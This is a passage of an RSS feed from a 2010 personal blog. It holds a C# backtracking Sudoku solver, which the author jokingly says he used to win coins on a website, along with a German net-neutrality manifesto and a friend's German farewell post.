<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>nazrek&#039;s home</title>
	<atom:link href="http://www.nazrek.org/index.php/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.nazrek.org</link>
	<description>::(IT)Security; Coding; Weird Stuff; moep; blubb &#38; of course: Sexiness compressed in a Blog ;P</description>
	<lastBuildDate>Mon, 16 Aug 2010 21:31:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>[C#] Sudoku Solver</title>
		<link>http://www.nazrek.org/index.php/2010/08/16/c-sudoku-solver/</link>
		<comments>http://www.nazrek.org/index.php/2010/08/16/c-sudoku-solver/#comments</comments>
		<pubDate>Mon, 16 Aug 2010 21:31:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Sources]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[beliebtestewebseite]]></category>
		<category><![CDATA[c#]]></category>
		<category><![CDATA[code]]></category>
		<category><![CDATA[csharp]]></category>
		<category><![CDATA[solver]]></category>
		<category><![CDATA[sudoku]]></category>

		<guid isPermaLink="false">http://www.nazrek.org/?p=941</guid>
		<description><![CDATA[Here&#8217;s some of the code I used back there to &#8220;hack&#8221; some coins at beliebtestewebseite.de. It&#8217;s just the coded needed to solve (bruteforce) the sudokou. *click* Anyways. Hopefully you can use it. It&#8217;s written in C#. The array &#8220;sudoku&#8221; contains all fields of the 9&#215;9 sudoku. A field contains &#8220;0&#8243;, if it&#8217;s &#8220;empty&#8221;. If the [...]]]></description>
			<content:encoded><![CDATA[<p>Here&#8217;s some of the code I used back there to &#8220;hack&#8221; some coins at beliebtestewebseite.de.<br />
It&#8217;s just the coded needed to solve (bruteforce) the sudokou.<br />
<a href="http://www.nazrek.org/index.php/2010/04/25/hacked-beliebtestewebseite-de/" target="_blank">*click*</a href><br />
Anyways. Hopefully you can use it. It&#8217;s written in C#.</p>
<p>The array &#8220;sudoku&#8221; contains all fields of the 9&#215;9 sudoku.<br />
A field contains &#8220;0&#8243;, if it&#8217;s &#8220;empty&#8221;.<br />
If the exception &#8220;Solution found&#8221; is thrown/catched,the programm stops, because the solution is,obviously, found. *g*<br />
There you go:</p>

<div class="wp_syntax"><div class="code"><pre class="csharp" style="font-family:monospace;"><span style="color: #000000;">&#123;</span>
	<span style="color: #FF0000;">int</span><span style="color: #000000;">&#91;</span>,<span style="color: #000000;">&#93;</span> sudoku <span style="color: #008000;">=</span> <span style="color: #008000;">new</span> <span style="color: #FF0000;">int</span><span style="color: #000000;">&#91;</span><span style="color: #FF0000;">9</span>, <span style="color: #FF0000;">9</span><span style="color: #000000;">&#93;</span><span style="color: #008000;">;</span>
        <span style="color: #0600FF;">try</span>  <span style="color: #000000;">&#123;</span> solve<span style="color: #000000;">&#40;</span><span style="color: #FF0000;">0</span>, <span style="color: #FF0000;">0</span><span style="color: #000000;">&#41;</span><span style="color: #008000;">;</span> <span style="color: #000000;">&#125;</span>
        	<span style="color: #0600FF;">catch</span> <span style="color: #000000;">&#40;</span>Exception ex<span style="color: #000000;">&#41;</span> <span style="color: #000000;">&#123;</span>
                MessageBox.<span style="color: #0000FF;">Show</span><span style="color: #000000;">&#40;</span><span style="color: #666666;">&quot;SCORE! :o&quot;</span><span style="color: #000000;">&#41;</span><span style="color: #008000;">;</span>
            <span style="color: #000000;">&#125;</span>
        <span style="color: #000000;">&#125;</span>
<span style="color: #000000;">&#125;</span>
&nbsp;
        <span style="color: #0600FF;">private</span> <span style="color: #0600FF;">void</span> solve<span style="color: #000000;">&#40;</span><span style="color: #FF0000;">int</span> row, <span style="color: #FF0000;">int</span> col<span style="color: #000000;">&#41;</span> <span style="color: #000000;">&#123;</span>
	    <span style="color: #0600FF;">if</span><span style="color: #000000;">&#40;</span> row <span style="color: #008000;">&gt;</span> <span style="color: #FF0000;">8</span> <span style="color: #000000;">&#41;</span>
                <span style="color: #0600FF;">throw</span> <span style="color: #008000;">new</span> Exception<span style="color: #000000;">&#40;</span> <span style="color: #666666;">&quot;Solution found&quot;</span> <span style="color: #000000;">&#41;</span> <span style="color: #008000;">;</span>
            <span style="color: #0600FF;">else</span> <span style="color: #000000;">&#123;</span>
                <span style="color: #008080; font-style: italic;">// Skip cells which are not empty</span>
                <span style="color: #0600FF;">while</span><span style="color: #000000;">&#40;</span> sudoku<span style="color: #000000;">&#91;</span>row,col<span style="color: #000000;">&#93;</span> <span style="color: #008000;">!=</span> <span style="color: #FF0000;">0</span> <span style="color: #000000;">&#41;</span> <span style="color: #000000;">&#123;</span>
                    <span style="color: #0600FF;">if</span><span style="color: #000000;">&#40;</span> <span style="color: #008000;">++</span>col <span style="color: #008000;">&gt;</span> <span style="color: #FF0000;">8</span> <span style="color: #000000;">&#41;</span> <span style="color: #000000;">&#123;</span>
                        col <span style="color: #008000;">=</span> <span style="color: #FF0000;">0</span> <span style="color: #008000;">;</span>
                        row<span style="color: #008000;">++</span> <span style="color: #008000;">;</span>
&nbsp;
                        <span style="color: #008080; font-style: italic;">// Throw an exception to stop the process if the puzzle is solved</span>
                        <span style="color: #0600FF;">if</span> <span style="color: #000000;">&#40;</span>row <span style="color: #008000;">&gt;</span> <span style="color: #FF0000;">8</span><span style="color: #000000;">&#41;</span>
                            <span style="color: #0600FF;">throw</span> <span style="color: #008000;">new</span> Exception<span style="color: #000000;">&#40;</span> <span style="color: #666666;">&quot;Solution found&quot;</span> <span style="color: #000000;">&#41;</span> <span style="color: #008000;">;</span>
                    <span style="color: #000000;">&#125;</span>
                <span style="color: #000000;">&#125;</span>
&nbsp;
                <span style="color: #008080; font-style: italic;">// Find a valid number for the empty cell</span>
                <span style="color: #0600FF;">for</span><span style="color: #000000;">&#40;</span> <span style="color: #FF0000;">int</span> num <span style="color: #008000;">=</span> <span style="color: #FF0000;">1</span><span style="color: #008000;">;</span> num <span style="color: #008000;">&lt;</span> <span style="color: #FF0000;">10</span><span style="color: #008000;">;</span> num<span style="color: #008000;">++</span> <span style="color: #000000;">&#41;</span> <span style="color: #000000;">&#123;</span>
                    <span style="color: #0600FF;">if</span><span style="color: #000000;">&#40;</span> checkRow<span style="color: #000000;">&#40;</span>row,num<span style="color: #000000;">&#41;</span> <span style="color: #008000;">&amp;&amp;</span> checkColumn<span style="color: #000000;">&#40;</span>col,num<span style="color: #000000;">&#41;</span> <span style="color: #008000;">&amp;&amp;</span> checkBox<span style="color: #000000;">&#40;</span>row,col,num<span style="color: #000000;">&#41;</span> <span style="color: #000000;">&#41;</span> <span style="color: #000000;">&#123;</span>
                        sudoku<span style="color: #000000;">&#91;</span>row,col<span style="color: #000000;">&#93;</span> <span style="color: #008000;">=</span> num <span style="color: #008000;">;</span>
&nbsp;
                        <span style="color: #008080; font-style: italic;">// Delegate work on the next cell to a recursive call</span>
                        <span style="color: #0600FF;">if</span><span style="color: #000000;">&#40;</span> col <span style="color: #008000;">&lt;</span> <span style="color: #FF0000;">8</span> <span style="color: #000000;">&#41;</span>
                            solve<span style="color: #000000;">&#40;</span> row, col <span style="color: #008000;">+</span> <span style="color: #FF0000;">1</span> <span style="color: #000000;">&#41;</span> <span style="color: #008000;">;</span>
                        <span style="color: #0600FF;">else</span>
                            solve<span style="color: #000000;">&#40;</span> row <span style="color: #008000;">+</span> <span style="color: #FF0000;">1</span>, <span style="color: #FF0000;">0</span> <span style="color: #000000;">&#41;</span> <span style="color: #008000;">;</span>
                    <span style="color: #000000;">&#125;</span>
                <span style="color: #000000;">&#125;</span>
&nbsp;
                <span style="color: #008080; font-style: italic;">// No valid number was found, clean up and return to caller</span>
                sudoku<span style="color: #000000;">&#91;</span>row,col<span style="color: #000000;">&#93;</span> <span style="color: #008000;">=</span> <span style="color: #FF0000;">0</span> <span style="color: #008000;">;</span>
            <span style="color: #000000;">&#125;</span>
        <span style="color: #000000;">&#125;</span>
&nbsp;
        <span style="color: #0600FF;">private</span> <span style="color: #FF0000;">bool</span> checkRow<span style="color: #000000;">&#40;</span><span style="color: #FF0000;">int</span> row, <span style="color: #FF0000;">int</span> num<span style="color: #000000;">&#41;</span> <span style="color: #000000;">&#123;</span>
            <span style="color: #0600FF;">for</span> <span style="color: #000000;">&#40;</span><span style="color: #FF0000;">int</span> col <span style="color: #008000;">=</span> <span style="color: #FF0000;">0</span><span style="color: #008000;">;</span> col <span style="color: #008000;">&lt;</span> <span style="color: #FF0000;">9</span><span style="color: #008000;">;</span> col<span style="color: #008000;">++</span><span style="color: #000000;">&#41;</span>
                <span style="color: #0600FF;">if</span> <span style="color: #000000;">&#40;</span>sudoku<span style="color: #000000;">&#91;</span>row,col<span style="color: #000000;">&#93;</span> <span style="color: #008000;">==</span> num<span style="color: #000000;">&#41;</span>
                    <span style="color: #0600FF;">return</span> false<span style="color: #008000;">;</span>
&nbsp;
            <span style="color: #0600FF;">return</span> true<span style="color: #008000;">;</span>
        <span style="color: #000000;">&#125;</span>
&nbsp;
        <span style="color: #0600FF;">private</span> <span style="color: #FF0000;">bool</span> checkColumn<span style="color: #000000;">&#40;</span><span style="color: #FF0000;">int</span> col, <span style="color: #FF0000;">int</span> num<span style="color: #000000;">&#41;</span> <span style="color: #000000;">&#123;</span>
            <span style="color: #0600FF;">for</span> <span style="color: #000000;">&#40;</span><span style="color: #FF0000;">int</span> row <span style="color: #008000;">=</span> <span style="color: #FF0000;">0</span><span style="color: #008000;">;</span> row <span style="color: #008000;">&lt;</span> <span style="color: #FF0000;">9</span><span style="color: #008000;">;</span> row<span style="color: #008000;">++</span><span style="color: #000000;">&#41;</span>
                <span style="color: #0600FF;">if</span> <span style="color: #000000;">&#40;</span>sudoku<span style="color: #000000;">&#91;</span>row, col<span style="color: #000000;">&#93;</span> <span style="color: #008000;">==</span> num<span style="color: #000000;">&#41;</span>
                    <span style="color: #0600FF;">return</span> false<span style="color: #008000;">;</span>
            <span style="color: #0600FF;">return</span> true<span style="color: #008000;">;</span>
        <span style="color: #000000;">&#125;</span>
&nbsp;
        <span style="color: #0600FF;">private</span> <span style="color: #FF0000;">bool</span> checkBox<span style="color: #000000;">&#40;</span><span style="color: #FF0000;">int</span> row, <span style="color: #FF0000;">int</span> col, <span style="color: #FF0000;">int</span> num<span style="color: #000000;">&#41;</span> <span style="color: #000000;">&#123;</span>
            row <span style="color: #008000;">=</span> <span style="color: #000000;">&#40;</span>row<span style="color: #008000;">/</span><span style="color: #FF0000;">3</span><span style="color: #000000;">&#41;</span><span style="color: #008000;">*</span><span style="color: #FF0000;">3</span><span style="color: #008000;">;</span>
            col <span style="color: #008000;">=</span> <span style="color: #000000;">&#40;</span>col<span style="color: #008000;">/</span><span style="color: #FF0000;">3</span><span style="color: #000000;">&#41;</span><span style="color: #008000;">*</span><span style="color: #FF0000;">3</span><span style="color: #008000;">;</span>
&nbsp;
            <span style="color: #0600FF;">for</span> <span style="color: #000000;">&#40;</span><span style="color: #FF0000;">int</span> r <span style="color: #008000;">=</span> <span style="color: #FF0000;">0</span><span style="color: #008000;">;</span> r <span style="color: #008000;">&lt;</span> <span style="color: #FF0000;">3</span><span style="color: #008000;">;</span> r<span style="color: #008000;">++</span><span style="color: #000000;">&#41;</span>
                <span style="color: #0600FF;">for</span> <span style="color: #000000;">&#40;</span><span style="color: #FF0000;">int</span> c <span style="color: #008000;">=</span> <span style="color: #FF0000;">0</span><span style="color: #008000;">;</span> c <span style="color: #008000;">&lt;</span> <span style="color: #FF0000;">3</span><span style="color: #008000;">;</span> c<span style="color: #008000;">++</span><span style="color: #000000;">&#41;</span>
                    <span style="color: #0600FF;">if</span> <span style="color: #000000;">&#40;</span>sudoku<span style="color: #000000;">&#91;</span>row <span style="color: #008000;">+</span> r,col <span style="color: #008000;">+</span> c<span style="color: #000000;">&#93;</span> <span style="color: #008000;">==</span> num<span style="color: #000000;">&#41;</span>
                        <span style="color: #0600FF;">return</span> false<span style="color: #008000;">;</span>
&nbsp;
            <span style="color: #0600FF;">return</span> true<span style="color: #008000;">;</span>
        <span style="color: #000000;">&#125;</span></pre></div></div>

<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=%5BC%23%5D+Sudoku+Solver+http://bit.ly/dj5Vgi+@nazrek" title="Post to Twitter"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-twitter-micro4.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://plurk.com/?status=%5BC%23%5D+Sudoku+Solver+http://bit.ly/dj5Vgi" title="Post to Plurk"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-plurk-micro3.png" alt="Post to Plurk" /></a> <a target="_blank" class="tt" href="http://buzz.yahoo.com/submit?submitUrl=http://www.nazrek.org/index.php/2010/08/16/c-sudoku-solver/&amp;submitHeadline=%5BC%23%5D+Sudoku+Solver" title="Post to Yahoo Buzz"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-buzz-micro4.png" alt="Post to Yahoo Buzz" /></a> <a target="_blank" class="tt" href="http://delicious.com/post?url=http://www.nazrek.org/index.php/2010/08/16/c-sudoku-solver/&amp;title=%5BC%23%5D+Sudoku+Solver" title="Post to Delicious"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-delicious-micro3.png" alt="Post to Delicious" /></a> <a target="_blank" class="tt" href="http://digg.com/submit?url=http://www.nazrek.org/index.php/2010/08/16/c-sudoku-solver/&amp;title=%5BC%23%5D+Sudoku+Solver" title="Post to Digg"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-digg-micro4.png" alt="Post to Digg" /></a> <a target="_blank" class="tt" href="http://www.facebook.com/share.php?u=http://www.nazrek.org/index.php/2010/08/16/c-sudoku-solver/&amp;t=%5BC%23%5D+Sudoku+Solver" title="Post to Facebook"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-facebook-micro3.png" alt="Post to Facebook" /></a> <a target="_blank" class="tt" href="http://www.myspace.com/Modules/PostTo/Pages/?l=3&amp;u=http://www.nazrek.org/index.php/2010/08/16/c-sudoku-solver/&amp;t=%5BC%23%5D+Sudoku+Solver" title="Post to MySpace"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-myspace-micro4.png" alt="Post to MySpace" /></a> <a target="_blank" class="tt" href="http://ping.fm/ref/?method=microblog&amp;title=%5BC%23%5D+Sudoku+Solver&amp;link=http://www.nazrek.org/index.php/2010/08/16/c-sudoku-solver/" title="Post to Ping.fm"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-ping-micro3.png" alt="Post to Ping.fm" /></a> <a target="_blank" class="tt" href="http://reddit.com/submit?url=http://www.nazrek.org/index.php/2010/08/16/c-sudoku-solver/&amp;title=%5BC%23%5D+Sudoku+Solver" title="Post to Reddit"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-reddit-micro4.png" alt="Post to Reddit" /></a> <a target="_blank" class="tt" href="http://stumbleupon.com/submit?url=http://www.nazrek.org/index.php/2010/08/16/c-sudoku-solver/&amp;title=%5BC%23%5D+Sudoku+Solver" title="Post to StumbleUpon"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-su-micro3.png" alt="Post to StumbleUpon" /></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.nazrek.org/index.php/2010/08/16/c-sudoku-solver/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Netzneutralität ist der Schlüssel zur Wahrung des freien Internets!</title>
		<link>http://www.nazrek.org/index.php/2010/08/11/netzneutralitat-ist-der-schlussel-zur-wahrung-des-freien-internets/</link>
		<comments>http://www.nazrek.org/index.php/2010/08/11/netzneutralitat-ist-der-schlussel-zur-wahrung-des-freien-internets/#comments</comments>
		<pubDate>Wed, 11 Aug 2010 13:26:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Virtual-life]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[netz]]></category>
		<category><![CDATA[neutral]]></category>
		<category><![CDATA[neutralität]]></category>

		<guid isPermaLink="false">http://www.nazrek.org/?p=933</guid>
		<description><![CDATA[Wir wollen ein freies und offenes Internet sicherstellen. Ein freies Internet ohne staatliche oder wirtschaftliche Eingriffe ist Garant für freien Meinungsaustausch weltweit und damit die direkte Ableitung des Rechts auf Meinungsfreiheit. Netzneutralität ist elementar für unsere Demokratie. Netzneutralität fördert die Entfaltung kreativer und ökonomischer Potentiale und sichert damit das Innovationspotential des Internets. Die Innovationsfähigkeit der [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p><strong>Wir wollen ein freies und offenes Internet sicherstellen.</strong></p>
<p>Ein freies Internet ohne staatliche oder wirtschaftliche Eingriffe ist Garant für freien Meinungsaustausch weltweit und damit die direkte Ableitung des Rechts auf Meinungsfreiheit. Netzneutralität ist elementar für unsere Demokratie.</p>
<p>Netzneutralität fördert die Entfaltung kreativer und ökonomischer Potentiale und sichert damit das Innovationspotential des Internets. Die Innovationsfähigkeit der Wirtschaft wird gestärkt wenn Entwicklungen frei online verfügbar sind und auch in neuen kollaborativen Ansätzen weiterentwickelt werden können. Innovationen brauchen Offenheit – die Möglichkeiten des Internets auf einige wenige Privileigierte zu beschränken, läuft dem entgegen.</p>
<p>Netzneutralität ist in unserer heutigen Gesellschaft sozial geboten. Sie verringert die digitale Spaltung, da die Übertragung von Internetinhalten nicht allein von der finanziellen Leistungsfähigkeit der Anbietenden oder Nutzenden abhängig ist. Netzneutralität sichert somit den Zugang zu Wissen und Informationen unabhängig von Herkunft, Aufenthaltsort, Einkommen, sozialer Schicht und ökonomischer Leistungsfähigkeit.</p>
<p>Die Aufgabe der Netzneutralität würde ein Zwei-Klassen Internet befördern, wo sich die großen Medien- und Internetkonzerne dieser Welt ihr eigenes Netz schaffen, und alternative und neue Anbieter damit verdrängt werden bzw. hinten anstehen müssten. Die zunehmende Kommerzialisierung vieler Dienstleistungen durch ein Aufbrechen der Netzneutralität im Internet und die damit einhergehende Monopolisierung, schränkt gerade die kreativen Potentiale des Internets und die Teilhabe daran erheblich ein. Ein Ende der Netzneutralität wäre innovationsfeindlich, da Neuentwicklungen ohne die finanzielle Ausstattung zum Erwerb der positiven Unterstützung der Internetanbieter, nicht mehr die Möglichkeit hätten sich einem Massenpublikum zu präsentieren. Bestehende Unternehmen könnten sich diesen priviligierten Zugang noch erkaufen, Neue meist nicht. Die Pluralität im Internet würde sinken und gefestigte Strukturen einseitig gestärkt.</p>
<p>Ohne Netzneutralität würde zunehmend eine Priorisierung durch die Internetanbieter stattfinden, entweder von eigenen Angeboten oder von Angeboten, die es sich leisten können, den privilegierten Zugang zu erwerben. Exklusive Partnerschaften zwischen Unternehmen würden zunehmen und gleichzeitig den wichtigen Grundsatz des freien Zugangs zum Internet künstlich beschränken. Die fatale Konsequenz: Statt Qualität, Sicherheit und Kreativität diktiert das Geld, welche Angebote im Internet nutzbar sind und welche nicht. Datenpakete würden nicht länger wie heute in den überwiegenden Fällen unabhängig von Inhalt und Anwendung gleichberechtigt übertragen werden.</p>
<p>Daher setzen wir uns für die neutrale Übermittlung von Daten im Internet, für die Netzneutralität, ein. Wir sehen mit dem möglichen Ende der Netzneutralität eine ganz erhebliche Gefahr für die digitale Gleichberechtigung und Teilhabe in Deutschland, Europa und der Welt . Das Ende der Netzneutralität wäre das Ende des freien Internets wie wir es kennen. Wir lehnen es mit aller Deutlichkeit ab, wenn Internetanbieter bereit sind, die Netzneutralität (und damit auch die Meinungsfreiheit im Internet) aufzugeben. Sei es , um diese als Spielball gegen staatliche Regulierung der Netzinfrastruktur einzusetzen oder sie aus Interessen der kurzfristigen Gewinnmaximierung zu missbrauchen. Vielmehr muss schneller und konsequenter in die Infrastruktur des Netzes investiert werden, statt die zunehmende Drosselung des Internets und Verknappung der Bandbreite voranzutreiben. Netzmanagement darf weder eine inhaltliche, politische noch ökonomische Kontrolle inne haben.</p>
<p>Netzneutralität ist notwendig für die zukünftige freie und kreative Entfaltung des Internets. Daher fordern wir die gesetzliche Verankerung der Netzneutralität.</p></blockquote>
<p>*signed*<a href=" http://pro-netzneutralitaet.de/"></p>
<p>http://pro-netzneutralitaet.de/</a></p>
<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=Netzneutralit%C3%A4t+ist+der+Schl%C3%BCssel+zur+Wahrung+des+freien+Internets...+http://bit.ly/9ZBzSJ+@nazrek" title="Post to Twitter"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-twitter-micro4.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://plurk.com/?status=Netzneutralit%C3%A4t+ist+der+Schl%C3%BCssel+zur+Wahrung+des+freien+Internets...+http://bit.ly/9ZBzSJ" title="Post to Plurk"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-plurk-micro3.png" alt="Post to Plurk" /></a> <a target="_blank" class="tt" href="http://buzz.yahoo.com/submit?submitUrl=http://www.nazrek.org/index.php/2010/08/11/netzneutralitat-ist-der-schlussel-zur-wahrung-des-freien-internets/&amp;submitHeadline=Netzneutralit%C3%A4t+ist+der+Schl%C3%BCssel+zur+Wahrung+des+freien+Internets..." title="Post to Yahoo Buzz"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-buzz-micro4.png" alt="Post to Yahoo Buzz" /></a> <a target="_blank" class="tt" href="http://delicious.com/post?url=http://www.nazrek.org/index.php/2010/08/11/netzneutralitat-ist-der-schlussel-zur-wahrung-des-freien-internets/&amp;title=Netzneutralit%C3%A4t+ist+der+Schl%C3%BCssel+zur+Wahrung+des+freien+Internets..." title="Post to Delicious"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-delicious-micro3.png" alt="Post to Delicious" /></a> <a target="_blank" class="tt" href="http://digg.com/submit?url=http://www.nazrek.org/index.php/2010/08/11/netzneutralitat-ist-der-schlussel-zur-wahrung-des-freien-internets/&amp;title=Netzneutralit%C3%A4t+ist+der+Schl%C3%BCssel+zur+Wahrung+des+freien+Internets..." title="Post to Digg"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-digg-micro4.png" alt="Post to Digg" /></a> <a target="_blank" class="tt" href="http://www.facebook.com/share.php?u=http://www.nazrek.org/index.php/2010/08/11/netzneutralitat-ist-der-schlussel-zur-wahrung-des-freien-internets/&amp;t=Netzneutralit%C3%A4t+ist+der+Schl%C3%BCssel+zur+Wahrung+des+freien+Internets..." title="Post to Facebook"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-facebook-micro3.png" alt="Post to Facebook" /></a> <a target="_blank" class="tt" href="http://www.myspace.com/Modules/PostTo/Pages/?l=3&amp;u=http://www.nazrek.org/index.php/2010/08/11/netzneutralitat-ist-der-schlussel-zur-wahrung-des-freien-internets/&amp;t=Netzneutralit%C3%A4t+ist+der+Schl%C3%BCssel+zur+Wahrung+des+freien+Internets..." title="Post to MySpace"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-myspace-micro4.png" alt="Post to MySpace" /></a> <a target="_blank" class="tt" href="http://ping.fm/ref/?method=microblog&amp;title=Netzneutralit%C3%A4t+ist+der+Schl%C3%BCssel+zur+Wahrung+des+freien+Internets...&amp;link=http://www.nazrek.org/index.php/2010/08/11/netzneutralitat-ist-der-schlussel-zur-wahrung-des-freien-internets/" title="Post to Ping.fm"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-ping-micro3.png" alt="Post to Ping.fm" /></a> <a target="_blank" class="tt" href="http://reddit.com/submit?url=http://www.nazrek.org/index.php/2010/08/11/netzneutralitat-ist-der-schlussel-zur-wahrung-des-freien-internets/&amp;title=Netzneutralit%C3%A4t+ist+der+Schl%C3%BCssel+zur+Wahrung+des+freien+Internets..." title="Post to Reddit"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-reddit-micro4.png" alt="Post to Reddit" /></a> <a target="_blank" class="tt" href="http://stumbleupon.com/submit?url=http://www.nazrek.org/index.php/2010/08/11/netzneutralitat-ist-der-schlussel-zur-wahrung-des-freien-internets/&amp;title=Netzneutralit%C3%A4t+ist+der+Schl%C3%BCssel+zur+Wahrung+des+freien+Internets..." title="Post to StumbleUpon"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-su-micro3.png" alt="Post to StumbleUpon" /></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.nazrek.org/index.php/2010/08/11/netzneutralitat-ist-der-schlussel-zur-wahrung-des-freien-internets/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Abschiedspost</title>
		<link>http://www.nazrek.org/index.php/2010/07/29/abschiedspost/</link>
		<comments>http://www.nazrek.org/index.php/2010/07/29/abschiedspost/#comments</comments>
		<pubDate>Thu, 29 Jul 2010 09:16:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Real-life]]></category>

		<guid isPermaLink="false">http://www.nazrek.org/?p=927</guid>
		<description><![CDATA[Hallo lieber Leser, dies ist ein Abschiedsbeitrag von Yvicoerchen. Ich hab hier schön öfters die Ehre gehabt was zu Posten und des is jetzt ein ganz persönlicher Post für Nazrek, den ich mit euch teilen will. Also gut Puffilein, wo fang ich denn am besten an. Der Anfang unserer Freundschaft war verrückt und man hätte [...]]]></description>
			<content:encoded><![CDATA[<p>Hallo lieber Leser,</p>
<p>dies ist ein Abschiedsbeitrag von Yvicoerchen.<br />
Ich hab hier schön öfters die Ehre gehabt was zu Posten und des is jetzt ein ganz persönlicher Post für Nazrek, den ich mit euch teilen will.</p>
<p>Also gut Puffilein, wo fang ich denn am besten an. Der Anfang unserer Freundschaft war verrückt und man hätte nie gedacht, dass du einer der wenigen Menschen wirst (Es gibt genau 2) die mich so gut kennen würden. Vorhin als ich das Lied gesucht hab, is mir wieder aufgefallen wie gut du mich kennst, wie du gleich weißt was ich möchte ohne das ich es aussprechen muss. Des war auch der Grund warum ich angefangen hab zu weinen weil ich erst jetzt gemerkt hab wie schwer es sein wird, dich nicht immer da zu haben wenn ich dich brauch. Es waren immer nur kleine Dinge aber genau diese Dinge machen es aus&#8230;<br />
Du warst immer für mich da, egal wann, egal um wie viel Uhr (Ich sag nur Hbf^^). Und jetzt mal gleich zum ernst des Lebens, glaub ja nicht das sich da was ändern wird. Ich werde immer noch dich mitten in der Nacht anrufen, wenn ich jemanden brauch der mir ohne iwelche Argumentare zuhört, oder ich jemanden brauche der mir seinen neutralen Rat gibt.</p>
<p>Puffi du <strong>bist</strong> und <strong>bleibst</strong> mein bester Freund und wir werden uns relativ regelmäßig sehen, da bin ich mir sicher, weil ohne dich halt ich es doch garnicht aus&#8230; Ich hab eig gedacht das des garnet so schwer wird aber iwie is es doch garnet so einfach. Ich werd unsere Shoppingtouren im Kaufland vermissen, da muss ich wohl ab jetzt selbst den Wagen schieben^^</p>
<p><em>Ich hab dich Lieb Puffi des darfst nie vergessen und es gibt niemanden der dich ersetzen kann! Niemand wird jemals so sehr mein bester Freund sein wie du es bist! </em></p>
<p>Deine Yvicoerchen <3</p>
<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=Abschiedspost+http://bit.ly/arwRSc+@nazrek" title="Post to Twitter"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-twitter-micro4.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://plurk.com/?status=Abschiedspost+http://bit.ly/arwRSc" title="Post to Plurk"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-plurk-micro3.png" alt="Post to Plurk" /></a> <a target="_blank" class="tt" href="http://buzz.yahoo.com/submit?submitUrl=http://www.nazrek.org/index.php/2010/07/29/abschiedspost/&amp;submitHeadline=Abschiedspost" title="Post to Yahoo Buzz"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-buzz-micro4.png" alt="Post to Yahoo Buzz" /></a> <a target="_blank" class="tt" href="http://delicious.com/post?url=http://www.nazrek.org/index.php/2010/07/29/abschiedspost/&amp;title=Abschiedspost" title="Post to Delicious"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-delicious-micro3.png" alt="Post to Delicious" /></a> <a target="_blank" class="tt" href="http://digg.com/submit?url=http://www.nazrek.org/index.php/2010/07/29/abschiedspost/&amp;title=Abschiedspost" title="Post to Digg"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-digg-micro4.png" alt="Post to Digg" /></a> <a target="_blank" class="tt" href="http://www.facebook.com/share.php?u=http://www.nazrek.org/index.php/2010/07/29/abschiedspost/&amp;t=Abschiedspost" title="Post to Facebook"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-facebook-micro3.png" alt="Post to Facebook" /></a> <a target="_blank" class="tt" 